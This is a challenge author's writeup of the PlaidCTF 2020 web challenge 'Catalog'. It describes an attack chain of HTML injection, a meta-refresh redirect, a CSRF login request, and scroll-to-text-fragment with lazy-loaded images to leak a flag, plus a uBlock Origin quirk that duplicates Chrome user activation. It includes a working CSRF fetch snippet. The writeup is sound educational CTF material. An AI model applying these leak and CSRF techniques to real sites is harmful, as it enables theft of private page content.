Down to the Wire

PlaidCTF 2020: Catalog Writeup

PlaidCTF 2020, with the theme Ready Pwner One, ran from April 17 to 19. We had a lot of very difficult problems, and all of them got solved… except for one:

Oops

At this point, it should probably come as little surprise that Catalog is one of mine; I don’t have the best record at having all of my problems solved (see: Toaster Wars Stormy Flag, idIoT: Lights). Here, I’ll discuss the intended solution to the problem, and a little behind-the-scenes look at what led me to write this problem and what I’d do differently if I had the chance to do it again.

The Problem

Story

Having thoroughly explored the anime section of the HQB Multimedia Library, you decide to venture on into the other sections. Next on your list is a section of comic books.

You’ve flipped through a few of the issues available, but they all seem like the standard fare. (Even if there’s some really rare stuff in here, not that you’d expect Action Comics No. 1 or Detective Comics No. 27 to be worth all that much in virtual form.) As you look around, one empty space on the shelf catches your attention. There’s an open spot for a series called Plaid Comics, which also appears to only have a single issue. Interesting.

Fortunately, the library has a catalog website, so you can look up the missing volume! The site’s a bit strange; it seems like it’s something of a community effort, and allows you to add your own descriptions for issues if they’re missing. However, descriptions aren’t public until an admin approves, and while you were able to find the issue in question, it appears that the description isn’t public. But if an admin can see it, that’s just as good as if you could see it, right?

Problem Details

Here’s the site. The flag is on this page.

Browser: Chromium with uBlock Origin 1.26.0 installed and in its default configuration

Flag format: /^PCTF\{[A-Z0-9_]+\}$/

Hints:

  • To view your post, the admin will click on a link on the admin page.
  • You might want to read up on User Activation.
  • The intended solution does not require you to submit hundreds of captchas.
  • The admin bot will always disconnect after about 30 seconds.

The Catalog Website

The Catalog site itself is a pretty good place to start. It looks like a pretty standard CTF web XSS challenge site; you can create and view posts, and you don’t have the ability to view the post that contains the flag, but you can report your own posts to make the admin look at them.

A quick test on each of the fields of a post indicates that the image field is injectable, while the other two aren’t:

Now that's some great content!

That said, the CSP on this site pretty much stops anything you might do with this injection dead in its tracks:

CSP
Content-Security-Policy: default-src 'nonce-hSQhz0nU1+JZmQDbJLaJ43ww+iPBVX1/'; img-src *; font-src 'self' fonts.gstatic.com; frame-src https://www.google.com/recaptcha/

The only particularly notable omission here is the lack of a restriction on base-uri, but as we don’t have an injection into the <head>, it seems like this isn’t exploitable. (While we can set the base-uri somewhere offsite, it won’t apply to the loaded scripts and styles since it appears after those are loaded.) Additionally, all of the elements that have the nonce set are before our injection, so any theoretical attack that might involve getting that attribute associated with an element we insert doesn’t seem possible either.
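To make the reasoning about this policy concrete, here is a small sketch that parses the header and reports which source list governs a given directive. The helper names (`parseCsp`, `effectiveSources`) are made up for illustration, and the fallback set is only a partial list of fetch directives; the point is that `script-src` and `style-src` inherit the nonce-only `default-src`, while `base-uri` has no fallback and is therefore unrestricted.

```javascript
// Fetch directives that fall back to default-src when absent (partial list,
// enough for this policy). base-uri is deliberately not in it.
const FALLS_BACK_TO_DEFAULT = new Set([
	"script-src", "style-src", "img-src", "font-src",
	"frame-src", "connect-src", "object-src", "media-src",
]);

// Hypothetical helper: turns a CSP header value into a directive -> sources map.
function parseCsp(header) {
	const policy = new Map();
	for (const part of header.split(";")) {
		const [name, ...sources] = part.trim().split(/\s+/);
		if (name) policy.set(name.toLowerCase(), sources);
	}
	return policy;
}

// Returns the source list governing a directive, or null if it is unrestricted.
function effectiveSources(policy, directive) {
	if (policy.has(directive)) return policy.get(directive);
	if (FALLS_BACK_TO_DEFAULT.has(directive) && policy.has("default-src")) {
		return policy.get("default-src");
	}
	return null;
}

const policy = parseCsp(
	"default-src 'nonce-hSQhz0nU1+JZmQDbJLaJ43ww+iPBVX1/'; img-src *; " +
	"font-src 'self' fonts.gstatic.com; frame-src https://www.google.com/recaptcha/"
);
console.log(effectiveSources(policy, "script-src")); // the nonce, via default-src
console.log(effectiveSources(policy, "img-src"));    // any origin
console.log(effectiveSources(policy, "base-uri"));   // null: not restricted
```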

However, there is one thing we can do despite the CSP: get the admin offsite by way of a <meta http-equiv="refresh" /> tag. CSP places no restriction on this tag, and it can appear anywhere in the document, so we can force the admin somewhere offsite.
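As a rough sketch of what such an injection might look like, the snippet below builds a value for the image field. It assumes the field is reflected inside a double-quoted attribute, so the payload first closes that attribute and tag; the real injection context may differ. `buildRefreshPayload` and the attacker URL are hypothetical.

```javascript
// Hypothetical helper: builds an image-field value that breaks out of a
// double-quoted attribute (an assumption about the injection context) and
// appends a meta refresh pointing at an attacker-controlled page.
function buildRefreshPayload(attackerUrl, delaySeconds = 0) {
	// Escape characters that would otherwise end the content attribute early.
	const safeUrl = attackerUrl.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
	return `"><meta http-equiv="refresh" content="${delaySeconds};url=${safeUrl}" />`;
}

console.log(buildRefreshPayload("https://attacker.example/start"));
```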

Playing with the other features of the site, we can see that some actions cause a banner to appear at the top of the page:

BAM!

The notable actions that trigger this are:

  • Logging in
  • Logging out
  • Missing username or password at login
  • Incorrect credentials at login
  • Creating a new post
  • Missing title or content at post creation

Of these, the only ones that contain content we control are the ones for login and incorrect credentials at login. We can’t do anything interesting with the successful login message, since the backend has some restrictions on valid usernames; however, the invalid credentials message is injectable!

Always hack with marquees.

An important part of how this feature works is that it can appear on any page. If you poke around with the login endpoint a bit, you’ll find that the response is always a 302 back to the referring page. From this, we can infer that the banners to show are stored in the session.

Putting these two pieces together, we can at least get to the point of having an injection on the page that has the flag! All we have to do is use our post to redirect the admin to a page we control, use a no-cors request from there to CSRF a failed login attempt back to the main site, and then send them to the flag page! We can do that with something like this:

JavaScript attack.js
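// Runs on the attacker-controlled page that the admin was redirected to.
// The failed login stores the "invalid credentials" banner, including our
// markup, in the admin's session.
fetch("http://catalog.pwni.ng/user.php", {
	method: "POST",
	mode: "no-cors", // we can't read the response, but the request is still sent
	credentials: "include", // send the admin's session cookie along
	headers: {
		"content-type": "application/x-www-form-urlencoded"
	},
	body: `username=${encodeURIComponent("<marquee>Nice!</marquee>")}&password=fail&action=login`
}).then(() => {
	// The banner is rendered on the next page the admin loads: the flag page.
	window.location = "http://catalog.pwni.ng/issue.php?id=3";
});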

You can see the code that gets us to this point in the exploit here.

Exfiltrating without scripts and styles

So now we have an injection on the page with the flag, but how can we use that to read the flag? We can’t inject any scripts or styles, so it seems like we’ll have to somehow leak the flag using nothing but plain HTML content.

A recently-released Chromium feature that came into some controversy is “scroll to text fragment” (which I’ll abbreviate STTF), a deep-linking mechanism that allows a link to refer to specific text on a page, which the browser will highlight and scroll to when the page loads. The security review document for the feature gives some very useful information about potential attack vectors. This should hopefully give us some ideas on how to proceed:

  • Anything timing-based seems unlikely to land, so we’d need to use a scroll-detection-based attack. As the document notes, this would require something like a cross-origin iframe that we could use to detect the scroll position offsite. (What could we inject to detect scroll position?)
  • STTF has some sort of relationship with User Activation, as the document notes that “the primary mitigation to [exfiltrating data via repeated requests] is to require a user gesture before activating the feature.” We’ll examine this more closely in the following sections.
  • Matches are forced to word boundaries to prevent letter-by-letter matches. (How can we bypass the fact that we can only match entire words?)
  • STTF is restricted to top-level browsing contexts (i.e., you can’t use STTF inside an iframe).

Let’s see if we can answer those two questions:

What could we inject to detect scroll position?

Due to the CSP, the only primitive we have for cross-origin communication is images, so we’ll have to use an image. Fortunately, recent versions of Chromium support lazy-loading images, which only get loaded when the user scrolls near them. So if we inject a bunch of whitespace followed by an <img loading="lazy" />, we can detect if the page scrolled to any content after the image!
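A minimal sketch of such a probe is below. Since inline styles are blocked by the CSP, it assumes the whitespace is produced with plain `<br>` tags; the count of 500 is a guess rather than a tuned value (Chromium starts fetching lazy images some distance before they enter the viewport, so the spacer needs to be generous). `buildScrollProbe` and the beacon URL are hypothetical names.

```javascript
// Hypothetical helper: pushes a lazy-loaded image far below the fold.
// The spacer uses <br> tags because style attributes are blocked by the CSP.
function buildScrollProbe(beaconUrl, spacerLines = 500) {
	const spacer = "<br>".repeat(spacerLines);
	// A request to beaconUrl means the browser scrolled close to the image.
	return `${spacer}<img loading="lazy" src="${beaconUrl}">`;
}

const probe = buildScrollProbe("https://attacker.example/hit?guess=X");
console.log(probe.length, probe.slice(-60));
```

Anything placed after this markup, such as the content we want to match, then sits below the image, so scrolling to it brings the image into range.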

How can we bypass the fact that we can only match entire words?

Perhaps a better question to start with would be “what qualifies as a word?”. Taking a look at the source for this feature, there’s a helpful comment that describes one facet of word-matching:

C++ text_fragment_finder.cc
// Determines whether the start and end positions of |range| are on word
// boundaries.
// TODO(crbug/924965): Determine how this should check node boundaries. This
// treats node boundaries as word boundaries, for example "o" is a whole word
// match in "f<i>o</i>o".

So we can match individual characters so long as they’re each in their own tag. However, there’s not much of a good reason why a website would want to do that… unless it wants to, say, implement some interesting typography.

POW!

The site implements this feature using lettering.js, a jquery plugin that splits an element into a <span> for each character. Conveniently, this happens to all <em> tags after the page loads, so all we need to do is inject an <em> tag that covers the content of the post, including the flag!
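To illustrate why this matters, here is a rough stand-in for the transformation: one `<span>` per character, so every character ends up in its own node and therefore counts as its own "word" for matching purposes. The `char1`, `char2`, ... class names are an assumption about the plugin's output, and `splitIntoSpans` is a hypothetical name; this is not the plugin's actual code.

```javascript
// Rough stand-in for a lettering-style split: one <span> per character.
// Class names are assumed; no HTML escaping is done, which is fine for the
// flag alphabet but not for arbitrary text.
function splitIntoSpans(text) {
	return Array.from(text)
		.map((ch, i) => `<span class="char${i + 1}">${ch}</span>`)
		.join("");
}

console.log(splitIntoSpans("PCTF"));
```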

Crafting an attack, part 1

Let’s put together what we’ve learned so far. It seems like the following is almost a viable approach:

  1. Admin clicks on a link to our post
  2. Our post redirects the admin to the attack site by way of <meta http-equiv="refresh" />
  3. CSRF from the attack site to make a failed login attempt, which injects a bunch of whitespace followed by a lazy-loading image followed by an <em> tag
  4. We redirect the admin to the flag page with a text fragment, e.g. #:~:text={-,X to check if the first character of the flag is an X
  5. If we receive a request for the lazy-loading image, then the first character of the flag is X; otherwise, it is not
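Step 4 can be sketched as a small URL builder. `buildGuessUrl` is a hypothetical helper; it produces the `prefix-,start` form of a text directive and percent-encodes both parts. Note that `encodeURIComponent` leaves `-` untouched, which would be a problem for text containing dashes but does not matter for this flag alphabet.

```javascript
// Hypothetical helper: builds a URL whose text fragment matches `guess`
// only when it directly follows `prefix` (the "prefix-,start" form).
function buildGuessUrl(pageUrl, prefix, guess) {
	const enc = encodeURIComponent;
	return `${pageUrl}#:~:text=${enc(prefix)}-,${enc(guess)}`;
}

console.log(buildGuessUrl("http://catalog.pwni.ng/issue.php?id=3", "{", "X"));
// http://catalog.pwni.ng/issue.php?id=3#:~:text=%7B-,X
```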

This is workable, except that we fail to meet the requirement that we have a user gesture on the page initiating the STTF request (here, the attack site). However, if we could somehow obtain or fake a user gesture on the attack site, we can see that this would work!

You can see the code that gets us to this point in the exploit here. Note above that the page scrolls and the lazy-loaded image loads because we “guessed” the first character of our fake flag correctly, as shown by the “N” being highlighted.

Now would probably be a good time to look into how exactly user gestures work in Chromium.

User Activation

One of the hints explicitly mentions the phrase “user activation”; a quick search should land you at this page, which describes the User Activation v2 API pushed fairly recently by Chrome. User Activation standardizes the behavior of other APIs that have traditionally required a “user gesture” of some kind, such as opening a popup or vibrating the user’s phone. This also explains the first hint: if the admin has to click on a link to navigate to our post initially, then that counts as an activation. That said, that activation shouldn’t carry over to pages loaded in the future, so that’s certainly not the entire reason we would need to look into this…

An interesting note about User Activation mentioned at the above page is that it can be passed between cross-origin frames via postMessage. In particular, the behavior of user activation follows this pattern:

  • When a user interacts with a frame, that frame and all of its ancestors in the frame tree are activated.
  • When an activated frame uses postMessage to communicate with an inactive frame with includeUserActivation set to true, the inactive frame becomes active.
  • When an API consumes the activation, all frames in the frame tree are deactivated.

(Note that I’m only referring to what that page calls the “transient bit” here, which is exposed as isActive in the API. The “sticky bit”, or hasBeenActive, is propagated through similar means but is never unset, and is ultimately not important for this problem.)

At first glance, this all seems pretty reasonable; a frame can only use an activation-gated API if it is interacted with or communicated to by an active frame, and every activation can only be consumed once since the entire frame tree gets deactivated.

Perhaps it’s time to look into the remaining piece of the problem that we haven’t considered yet.

uBlock Origin

Since Chrome extensions have several parts, it’s important to first have a basic understanding of what those parts are and what they can do. A pretty good explanation can be found on the overview page of the Chrome extensions documentation, which is best summarized by this diagram:

Anatomy of a Chrome extension

In short, an extension can have up to three pieces. Most extensions have a background page, which is an execution context in which the extension can set listeners for the events it cares about. This is also the part of the extension that gets access to the low-level chrome.* APIs, which give fine-grained control over some of Chrome’s inner workings that aren’t exposed to ordinary page JavaScript. Extensions may also have a popup window, which appears when you click on the icon and usually contains configuration options and access to extension-level actions. Finally, an extension may also inject a content script into every page that loads, which runs alongside any scripts that are loaded by the site being accessed. Content scripts are important as they are the only way to actually interact with the running page, for example by reading or manipulating the DOM.

As the diagram shows, in order for these pieces to communicate, they need to use some sort of message-passing mechanism. And that means using postMessage! If you look at uBlock Origin’s content script, you can see a handful of calls to vAPI.messaging.send, which is an abstraction on top of a postMessage call.

However, it seems like in the context of User Activation, this would be of limited use since the includeUserActivation flag isn’t set, right? As it turns out, the options argument doesn’t exist for the variant of postMessage used by content scripts to communicate with the background page; it will always include the user activation if it has one!

At this point, you might be wondering why this is important. Let’s consider: what happens when a user interaction occurs alongside an extension using postMessage for communication? Since the user interacts with the page, the foreground frame becomes active. If the content script were to post a message to the background frame for some reason, it would then become active as well since it received a message from an active frame. If the activation were then consumed in some way by the foreground frame, it would deactivate all of the frames in its frame tree – but this does not include the extension’s background frame! If the background frame then posted a message to the foreground frame, it would then get reactivated since it received a message from an active frame, thus duplicating the user activation!

This also provides a convenient method of moving a user activation between unrelated pages. Rather than consuming the activation, what happens if the main frame navigates? Obviously, it gets deactivated, but if the extension’s background page postMessages to it before the activation times out, then it will get reactivated on the new page!
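The duplication described above can be played through with a toy model of the transient bit. This is only an illustration of the rules as stated in this post, not Chromium's implementation: it ignores the activation timeout, and its `postMessage` always carries the activation, which corresponds to the extension messaging variant rather than a plain `window.postMessage` without `includeUserActivation`.

```javascript
// Toy model of the transient activation bit (illustrative only).
class Frame {
	constructor(name, parent = null) {
		this.name = name;
		this.parent = parent;
		this.children = [];
		this.active = false;
		if (parent) parent.children.push(this);
	}
	root() {
		return this.parent ? this.parent.root() : this;
	}
	// A user gesture activates the frame and all of its ancestors.
	interact() {
		for (let f = this; f; f = f.parent) f.active = true;
	}
	// A message from an active frame activates the receiver.
	postMessage(target) {
		if (this.active) target.active = true;
	}
	// Consuming the activation clears the bit in this frame tree only.
	consume() {
		const clear = (f) => { f.active = false; f.children.forEach(clear); };
		clear(this.root());
	}
}

const page = new Frame("page");
const background = new Frame("uBlock background"); // lives in a separate frame tree

page.interact();              // the user clicks a link
page.postMessage(background); // the content script messages the background page
page.consume();               // the page consumes the activation (or navigates)
background.postMessage(page); // the background page messages the page again

console.log(page.active, background.active); // true true
```

The page ends up active again even though its activation was already spent, because the copy held by the background frame was never cleared.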

This is a good idea, but how can we trigger it in practice? As it turns out, we don’t need to do anything, as all of the pieces are already a part of uBlock’s core behavior. In particular, if we look through the usages of vAPI.messaging.send, one use of it is to signal the background page that it’s ok to let through a popup resulting from a clicked link:

JavaScript contentscript.js
const onMouseClick = function(ev) {
	if ( ev.isTrusted === false ) { return; }
	vAPI.mouseClick.x = ev.clientX;
	vAPI.mouseClick.y = ev.clientY;

	// https://github.com/chrisaljoudi/uBlock/issues/1143
	//   Find a link under the mouse, to try to avoid confusing new tabs
	//   as nuisance popups.
	// https://github.com/uBlockOrigin/uBlock-issues/issues/777
	//   Mind that href may not be a string.
	const elem = ev.target.closest('a[href]');
	if ( elem === null || typeof elem.href !== 'string' ) { return; }
	vAPI.messaging.send('contentscript', {
		what: 'maybeGoodPopup',
		url: elem.href || '',
	});
};

Further, on loading a new page, the content script will always open a communication with the background frame, receive a message from it, and send a message to it. This means that if we click on a link with uBlock on, the following will happen:

User Activation gone wrong

So, in theory, the simple act of clicking on a link with uBlock Origin enabled moves the activation to the new page. We can validate this pretty easily by creating a custom build of uBlock that adds some logging:

You can see the code for this POC here.

Crafting an attack, part 2

Using our knowledge of User Activation, we now end up with the following:

  1. Admin clicks on a link to our post (given in hint 1), activating the foreground frame
    • The foreground frame posts to uBlock’s background frame, activating it
    • The foreground frame navigates to our post and is deactivated
    • uBlock sends a message back and forth on page load, so the foreground frame is activated
  2. The <meta http-equiv="refresh" /> in our post kicks in, navigating the foreground frame to an attacker-controlled site
    • uBlock sends a message back and forth on page load, so the foreground frame is activated
  3. We CSRF from the attacker-controlled site to make a failed login attempt on the Catalog site, injecting with whitespace, a lazy-loading image, and an <em> tag
  4. We redirect from the attacker-controlled site to the page with the flag, including a text fragment that searches for the next character of the flag (which is honored since our current frame is activated)
  5. We either receive a request for the lazy-loaded image (indicating our guess was correct) or we do not (indicating our guess was incorrect)

However, with the given flag alphabet, this would take up to 38 guesses per character, or 1140 submissions for an entire 30-character flag. This is clearly infeasible. However, we can make some improvements.

First, we can put multiple STTF directives in a single URL, so we can put in the fragments for half of the alphabet to leak a full bit of information at a time. This will take us at most 6 guesses per character, or a total of 180 submissions for a 30-character flag, which is much closer but still infeasible.
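A sketch of this halving strategy follows. It assumes the 38 candidates are the flag alphabet plus the closing brace (the breakdown is not spelled out above), and the `scrolled` callback is a hypothetical oracle standing in for "did we receive a request for the lazy-loaded image?". The helper names are made up for illustration.

```javascript
// Candidate characters: the flag alphabet plus the closing brace (assumed).
const ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_}".split("");

// Builds one fragment containing a text directive per candidate.
function buildMultiGuessFragment(prefix, candidates) {
	const enc = encodeURIComponent;
	return "#:~:" + candidates.map((c) => `text=${enc(prefix)}-,${enc(c)}`).join("&");
}

// Narrows the candidates by halving until one remains.
// `scrolled(fragment)` must return true if the page scrolled for that fragment.
function findNextChar(prefix, scrolled) {
	let candidates = ALPHABET;
	let guesses = 0;
	while (candidates.length > 1) {
		const half = candidates.slice(0, Math.ceil(candidates.length / 2));
		guesses += 1;
		candidates = scrolled(buildMultiGuessFragment(prefix, half))
			? half
			: candidates.slice(half.length);
	}
	return { char: candidates[0], guesses };
}

console.log(buildMultiGuessFragment("{", ["A", "B", "C"]));
// #:~:text=%7B-,A&text=%7B-,B&text=%7B-,C
```

In a real run, each call to `scrolled` would be one round-trip through the flag page rather than a local function call.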

Second, there’s nothing stopping us from doing multiple round-trips in a single submission! In particular, if we’re faster than the user activation timeout (which appears to be 5 seconds), then the background frame is still activated, so we can use another <meta http-equiv="refresh" /> to get back to our own site and make another guess! This approach will net about 30 round-trips per submission, which means that we’ll need to submit roughly 6 captchas, which should be totally fine.
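The numbers in the last few paragraphs can be checked with a few lines of arithmetic. The breakdown of 38 as the 37-character flag alphabet plus the closing brace is an assumption; the flag length and round-trips per submission are the approximate figures used above.

```javascript
const alphabetSize = 26 + 10 + 1 + 1; // A-Z, 0-9, "_", plus "}" (assumed breakdown)
const flagLength = 30;                 // estimate used in the text
const roundTripsPerSubmission = 30;    // approximate figure from the text

const linearSubmissions = alphabetSize * flagLength;       // one guess per submission
const guessesPerChar = Math.ceil(Math.log2(alphabetSize)); // halving the candidates
const totalGuesses = guessesPerChar * flagLength;
const captchas = Math.ceil(totalGuesses / roundTripsPerSubmission);

console.log({ linearSubmissions, guessesPerChar, totalGuesses, captchas });
// { linearSubmissions: 1140, guessesPerChar: 6, totalGuesses: 180, captchas: 6 }
```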

One last point to note: the particular way in which we specify our text fragment is very important. Since we’ll scroll to the first point on the page that matches our fragment, we need to minimize the chance that we’ll falsely identify another string on the page as part of the flag. The best way I could think of to do this is to use a fragment like #:~:text=A-,B,-C if the last two characters that we know about are AB and we want to check if the next character is C, which would force ABC to appear in order to detect the next character, with an error occurring only if AB appears somewhere else on the page.
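The effect of adding context can be seen with a toy matcher. It treats every character as its own node (as on the flag page after the typography script has run) and only compares the immediately adjacent characters; real text-fragment matching has more rules, so this only shows the idea. The page text and `matchPositions` are made up for illustration.

```javascript
// Toy matcher: returns the indices where `start` appears with the given
// prefix directly before it and the given suffix directly after it.
function matchPositions(text, { prefix = "", start, suffix = "" }) {
	const hits = [];
	for (let i = 0; i + start.length <= text.length; i++) {
		const before = text.slice(Math.max(0, i - prefix.length), i);
		const after = text.slice(i + start.length, i + start.length + suffix.length);
		if (text.startsWith(start, i) && before === prefix && after === suffix) {
			hits.push(i);
		}
	}
	return hits;
}

const pageText = "PLAID COMICS PCTF{FAKE_FLAG}"; // made-up page content
console.log(matchPositions(pageText, { start: "C" }).length);              // 3
console.log(matchPositions(pageText, { prefix: "P", start: "C", suffix: "T" })); // [ 14 ]
```

A bare `C` matches three places on this page, while the `P-,C,-T` form only matches inside the flag.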

Here’s what this attack looks like in action!

The full exploit can be found here.

Inspiration

One day at work, I was looking into whether or not a certain feature of our site supported an unreasonably old version of Chrome that a hardware supplier was installing on their devices. I don’t remember what feature I was looking for exactly, or what version of Chrome I was trying to target, but I do remember absentmindedly scrolling through the Wikipedia article on Chrome’s version history when I came across an interesting entry under Chrome 80:

You what now?

This immediately caught my interest, and after looking into the feature a bit deeper, I just knew I had to write a client-focused web problem that used it.

Over the next few weeks I fleshed out the problem a bit more. I looked into how STTF matched words, and realized that weird typography could be a way to allow STTF to match individual characters. I looked into methods of exfiltrating and came upon the idea of using lazy-loading images.

It was all going great until a couple of days before Plaid, when I went to set up the admin bot and found that my exploit didn’t work.

All of my testing up to that point had been in the browser I use day-to-day, so naturally I had a bunch of extensions enabled. After a long debugging session of flipping every flag I could think of and eventually enabling extensions one at a time in my main browser, I realized that uBlock was doing something weird that was allowing me to trigger STTF when I shouldn’t be able to due to user activation.

A couple hours later, I finally figured out what was going on, and I ultimately decided that it was neat enough that I wanted to include it in the problem as well. Since this adds quite a bit of difficulty to the problem, I decided to add in the hints to hopefully push competitors in the right direction.

Execution

I was kind of worried when 24 hours passed and nobody had solved the problem yet, and I hadn’t seen any signs that anyone was making significant progress. I decided to take a poll of all of the teams to see where everyone was, because for fairness reasons any hint I gave would need to be something that nobody had figured out yet.

To my surprise, it turned out that herrera of ELT basically had the entire exploit figured out! Based on his response to me, the only hint I could reasonably give at this point would have been something like “the flag is not in <em> tags on the flag page,” but that seemed far too targeted so I ultimately opted not to release a hint.

Unfortunately, herrera wasn’t ultimately able to leak the entire flag in time, though he had the entirety of the part of it that was readable text. He just had a few hex characters to go and he would’ve gotten the entire flag!

Now that it’s over, I guess a reasonable question would be: what would I do differently if I were to run this problem again? I think that perhaps simply mentioning User Activation wasn’t a strong enough hint in any particular direction. My assumption had been that competitors would probably look into that first, which would give them guidance in how to approach uBlock and indicate to them that they’re looking in the right places when they see that STTF requires a user gesture. Based on the feedback I received, however, it seems like this was probably not the case.

I think it may have made for a better challenge if I pointed out the specific link-clicking code in uBlock and said “something is weird with this,” and let the competitors take it from there. uBlock is a pretty large surface, after all, so some added direction there probably would have been a reasonable move.

Oh well. It seemed like people generally enjoyed the challenge nonetheless. Here’s hoping all of my challenges get solved next year, so at least my record can be 2-3!